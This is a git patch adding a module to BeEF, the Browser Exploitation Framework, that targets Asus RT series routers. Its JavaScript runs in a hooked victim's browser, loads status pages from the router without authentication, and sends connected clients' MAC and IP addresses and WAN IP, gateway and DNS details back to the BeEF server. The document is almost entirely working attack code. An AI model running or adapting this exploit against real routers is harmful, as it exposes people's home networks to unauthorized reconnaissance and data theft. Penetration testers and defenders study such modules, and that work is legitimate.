From 32fab589d6cc3f07723fa0e099022a814c1a7d47 Mon Sep 17 00:00:00 2001 From: Brendan Coles Date: Tue, 20 May 2014 16:59:40 +0000 Subject: [PATCH] Add Asus RT Series Get Info module --- .../router/asus_rt_series_get_info/command.js | 48 +++++++++++++++++++ .../asus_rt_series_get_info/config.yaml | 15 ++++++ .../router/asus_rt_series_get_info/module.rb | 19 ++++++++ 3 files changed, 82 insertions(+) create mode 100644 modules/exploits/router/asus_rt_series_get_info/command.js create mode 100644 modules/exploits/router/asus_rt_series_get_info/config.yaml create mode 100644 modules/exploits/router/asus_rt_series_get_info/module.rb diff --git a/modules/exploits/router/asus_rt_series_get_info/command.js b/modules/exploits/router/asus_rt_series_get_info/command.js new file mode 100644 index 000000000..af0edc582 --- /dev/null +++ b/modules/exploits/router/asus_rt_series_get_info/command.js @@ -0,0 +1,48 @@ +// +// Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net +// Browser Exploitation Framework (BeEF) - http://beefproject.com +// See the file 'doc/COPYING' for copying permission +// + +beef.execute(function() { + var target_ip = '<%= @target_ip %>'; + + load_script = function(url) { + var s = document.createElement("script"); + s.type = 'text/javascript'; + s.src = url; + document.body.appendChild(s); + } + + get_info = function() { + + beef.debug(target_ip + " - gathering info..."); + + var clients = Client_IP_MAC; + var wanip = wanlink_ipaddr(); + var netmask = wanlink_netmask(); + var gateway = wanlink_gateway(); + var dns = wanlink_dns(); + + beef.debug(target_ip + " - Clients: " + clients); + beef.debug(target_ip + " - WAN IP: " + wanip); + beef.debug(target_ip + " - Gateway: " + gateway); + beef.debug(target_ip + " - DNS: " + dns); + beef.debug(target_ip + " - gathering info completed"); + + beef.net.send("<%= @command_url %>", <%= @command_id %>, + "clients=" + clients + + "&wanip=" + wanip + + "&netmask=" + netmask + + "&gateway=" + gateway + + "&dns=" + dns + ); + } + + beef.debug(target_ip + " - loading scripts..."); + load_script("http://" + target_ip + "/status.asp"); + load_script("http://" + target_ip + "/get_wan_status.asp"); + setTimeout("get_info()", 10000); + +}); + diff --git a/modules/exploits/router/asus_rt_series_get_info/config.yaml b/modules/exploits/router/asus_rt_series_get_info/config.yaml new file mode 100644 index 000000000..eecefb5d5 --- /dev/null +++ b/modules/exploits/router/asus_rt_series_get_info/config.yaml @@ -0,0 +1,15 @@ +# +# Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission +# +beef: + module: + asus_rt_series_get_info: + enable: true + category: ["Exploits", "Router"] + name: "Asus RT Series Get Info" + description: "This module retieves information from an Asus RT series router unauthenticated. The information retrieved includes all connected LAN clients (MAC address and LAN IP) and WAN link details (WAN IP address, gateway, DNS server)." + authors: ["bcoles"] + target: + working: ["ALL"] diff --git a/modules/exploits/router/asus_rt_series_get_info/module.rb b/modules/exploits/router/asus_rt_series_get_info/module.rb new file mode 100644 index 000000000..864a6e373 --- /dev/null +++ b/modules/exploits/router/asus_rt_series_get_info/module.rb @@ -0,0 +1,19 @@ +# +# Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission +# +class Asus_rt_series_get_info < BeEF::Core::Command + + def self.options + return [ + { 'name' => 'target_ip', 'ui_label' => 'Target IP', 'value' => '192.168.1.1' } + ] + end + + def post_execute + save({'result' => @datastore['result']}) + end + +end +